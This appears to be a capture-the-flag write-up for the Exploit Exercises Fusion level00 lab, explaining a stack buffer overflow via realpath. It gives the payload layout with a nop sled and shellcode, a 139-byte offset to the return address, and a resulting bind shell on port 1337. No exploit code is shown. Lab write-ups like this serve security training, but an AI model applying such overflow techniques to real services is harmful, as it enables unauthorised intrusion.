Exploit Exercises - Fusion Level00
This challenge is pretty much a straight forward stack overflow where you are using the fact that when we call real_path:
our path
variable’s size is controlled by our initial read in parse_http_request
:
as our path
variable is simply a pointer to a location in buffer
4 bytes in. So looking up what realpath
does we find that it will copy the given path
string to our resolved
buffer expanding any relative paths that we might have. realpath
will also make sure that the file actually exists and if it doesn’t it will return NULL
. So for our sake we really don’t care if we can access the strcpy
because realpath
will do the same thing for us!
So now that we know what we are targeting, we need to make sure we pass the earlier checks to actually get to this point.
So from this we can deduce our payload is going to be something in the form of GET <fill buffer><return address>; HTTP/1.1<nop sled><shellcode>;
. You can stick your shellcode in the nop sled but it is up to you :D Since we want $eip to point to our shellcode located some number of bytes away from the start of our buffer, we can start with using the buffer address that get leaked to us by the program and add some offset to get to our nop sled (the nop sled is optional here since we can really just calculate the exact offset but I was too lazy lol). Wiht some playing around in the binary you can find number of bogus characters to fill the buffer to be 139, after the 139th character, you will begin to overwrite the return address :D. Thus we would want our return address would be: buffer address + 139 + a few more to make sure we go past the return address that we stuck in there and onto the nop sled. Putting it all together we get:
We then have a shell listening on port 1337 that we can nc into :D
(I used a collection of helper functions from Blankwall’s Template library. I encourage you to check it out: (Github)